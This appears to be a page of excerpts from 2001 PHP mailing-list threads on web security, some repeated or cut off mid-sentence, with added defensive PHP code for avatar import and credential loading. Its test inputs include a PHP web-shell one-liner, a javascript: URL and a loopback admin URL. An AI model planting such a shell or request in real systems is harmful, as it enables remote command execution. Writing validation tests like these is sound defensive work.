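    if (str_starts_with($bytes, "\xFF\xD8\xFF")) {
        return 'jpeg';
    }
    if (str_starts_with($bytes, 'GIF87a') || str_starts_with($bytes, 'GIF89a')) {
        return 'gif';
    }
    if (str_starts_with($bytes, "\x89PNG\r\n\x1a\n")) {
        return 'png';
    }
    return null;
}

/** Fetch, verify and store; returns the local file name or null. The URL itself is never embedded. */
function import_avatar(string $url, string $storeDir, int $maxBytes = 512 * 1024): ?string
{
    if (!acceptable_image_url($url)) {
        return null;
    }
    $ctx   = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $bytes = @file_get_contents($url, false, $ctx, 0, $maxBytes + 1);
    if ($bytes === false || strlen($bytes) > $maxBytes) {
        return null;
    }
    $type = sniff_image_type($bytes);
    if ($type === null) {
        return null;                             // "photo.jpg" that is really HTML or PHP
    }
    $name = bin2hex(random_bytes(16)) . '.' . $type;   // server-chosen name, not the user's
    file_put_contents($storeDir . '/' . $name, $bytes);
    return $name;
}

// Offline checks with constructed inputs (no network needed for these).
var_dump(acceptable_image_url('javascript:alert(1)'));                 // wrong scheme
var_dump(acceptable_image_url('http://user:pw@example.com/a.jpg'));    // embedded credentials
var_dump(acceptable_image_url('http://127.0.0.1/admin/delete?id=1'));  // loopback address
var_dump(sniff_image_type("<?php system(\$_GET['c']); ?>"));           // PHP source, whatever the extension said
var_dump(sniff_image_type("GIF89a\x01\x00\x01\x00"));                  // real GIF header
```

Two caveats. The name resolved in acceptable_image_url() and the one used by the fetch can differ if the attacker controls DNS (rebinding), so a stricter version resolves once and connects to that address; and storing the bytes on your own host means the img tag in every visitor's page points at you, which is exactly what removes the forged-request problem Chris describes.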
Happy Friday!
I don't know anything about the innards of the PHP/Apache relationship. I am
wondering if there is a security advantage to using the getenv() function to
access an environment variable, instead of using the $HTTP_SERVER_VARS
array, or, if register_globals is on, the global version
On Wednesday 17 October 2001 19:14, Daniel Goldin wrote:
But I need to protect the files themselves. Is
there a way to protect the files without adding another level of
authorization when someone does access them from the browser?
Move these text files one
In a lot of PHP code that I have seen, there are lines such as this:
mysql_connect('localhost', mysql_login(), mysql_password());
that is used to hide the login and password from someone should they
somehow view the code instead of the output of the PHP file. My question
is, how do I set
somehow view the code instead of the output of the PHP file. My question
is, how do I set up those functions mysql_login and mysql_password? Are
they just standard functions defined in a header someplace? Or is this even
the best, most secure way of handling it?
Include your login and
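Added example (editor's code, not from either thread) for the two credential questions above, the SetEnv approach from Chris's article and the mysql_login()/mysql_password() wrapper question. Both come down to keeping the database login where a served or leaked PHP file cannot reveal it: in a file outside the document root that only the PHP user can read, or in the environment the web server exports before PHP runs. The loader refuses a credentials file whose permissions would let other accounts on the host read it. Paths and variable names are assumptions.

```php
<?php
// Added example, not from the thread. The credentials file below is constructed in a temp location.
declare(strict_types=1);

/** Read user/pass from an ini file outside the docroot, refusing one that others can read. */
function load_db_credentials_from_file(string $path): array
{
    if (!is_file($path)) {
        throw new RuntimeException("credentials file missing: $path");
    }
    $mode = fileperms($path) & 0777;
    if (($mode & 0077) !== 0) {
        throw new RuntimeException(sprintf('%s is mode %o; expected 0600 or 0400', $path, $mode));
    }
    $ini = parse_ini_file($path, false, INI_SCANNER_TYPED);
    if ($ini === false || !isset($ini['user'], $ini['pass'])) {
        throw new RuntimeException('credentials file is incomplete');
    }
    return ['user' => (string)$ini['user'], 'pass' => (string)$ini['pass']];
}

/** Credentials the web server exported with SetEnv DB_USER / DB_PASS, or null if it did not. */
function load_db_credentials_from_env(): ?array
{
    $user = getenv('DB_USER');
    $pass = getenv('DB_PASS');
    return ($user !== false && $pass !== false) ? ['user' => $user, 'pass' => $pass] : null;
}

/** Environment first (nothing on disk under the docroot), file as the fallback. */
function db_credentials(string $fallbackFile): array
{
    return load_db_credentials_from_env() ?? load_db_credentials_from_file($fallbackFile);
}

// Demonstration. In production the file would be e.g. /home/account/private/db.ini,
// above public_html, owned by the PHP user and chmod 600.
$file = tempnam(sys_get_temp_dir(), 'dbcred');
file_put_contents($file, "user = \"myuser\"\npass = \"mypass\"\n");

chmod($file, 0644);                              // group/world readable: refused
try {
    db_credentials($file);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}

chmod($file, 0600);                              // owner only: accepted
$cred = db_credentials($file);
// $pdo = new PDO('mysql:host=localhost;dbname=app', $cred['user'], $cred['pass']);
unlink($file);
```

Two caveats a shared host adds. With mod_php, a value set by SetEnv is visible to every script in that Apache process, so phpinfo() or a print_r($_SERVER) in any site it serves shows it; and the file permission check only separates you from other customers if your PHP runs as your own account (suexec, FPM pools), not as one shared www user.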
Hello there,
I'm posting a username and a password with:
<input type="hidden" name="username" value="<?php echo $username ?>">
<input type="hidden" name="password" value="<?php echo $password ?>">
When I check $HTTP_POST_VARS I can see the values as they're plain text. Is
this still safe to do or
I think you should encrypt (crypt).
On Tue, 13 Feb 2001, Marc Aragnou wrote:
Hello there,
I'm posting a username and a password with:
<input type="hidden" name="username" value="<?php echo $username ?>">
<input type="hidden" name="password" value="<?php echo $password ?>">
When I check
From: "Marc Aragnou" [EMAIL PROTECTED]
To: "PHP Lists" [EMAIL PROTECTED]
Sent: Tuesday, February 13, 2001 6:00 AM
Subject: [PHP] security question
Hello there,
I'm posting a username and a password with:
<input type="hidden" name="username" value="<?php echo $username